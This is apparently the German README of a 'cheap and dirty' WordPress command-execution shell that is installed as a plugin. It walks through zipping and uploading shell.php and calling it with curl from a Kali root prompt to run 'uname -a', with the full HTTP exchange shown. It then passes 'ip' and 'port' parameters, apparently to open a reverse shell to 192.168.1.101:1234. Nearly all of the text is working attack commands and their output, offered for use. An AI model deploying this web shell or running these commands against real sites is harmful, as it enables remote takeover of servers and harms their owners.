
Billige & fiese WordPress-Befehlsausführungsshell
Günstige & schmutzige WordPress-Befehlausführungs-Shell.
Führen Sie Befehle als Webserver aus, unter dem Sie WordPress betreiben! Die hochgeladene Shell befindet sich wahrscheinlich unter /wp-content/plugins/shell/shell.php
Um die Shell zu installieren, gehen wir davon aus, dass Sie administrativen Zugriff auf die WordPress-Installation haben und Plugins installieren können.
Laden Sie entweder die ZIP-Datei aus dem Verzeichnis dist/ hoch oder erstellen Sie Ihr eigenes Archiv mit:
$ zip -r shell.zip shell.php
adding: shell.php (deflated 39%)
$ ls -lah shell.zip
-rw-r--r-- 1 bob staff 492B Aug 29 14:17 shell.zip
Navigieren Sie nach dem Hochladen zu /wp-content/plugins/shell/shell.php und geben Sie cmd oder ip als Argument an.
root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
* About to connect() to 192.168.0.1 port 80 (#0)
* Trying 192.168.0.1...
* connected
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> GET /wp-content/plugins/shell/shell.php?cmd=uname+-a HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.0.1
> Accept: */*
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Thu, 28 Aug 2014 09:28:24 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4
< Vary: Accept-Encoding
< Content-Length: 191
< Content-Type: text/html
Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"192.168.1.101"})')"
root@kali:~# curl -v "http://192.168.0.1/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"192.168.1.101","port":"1234"})')"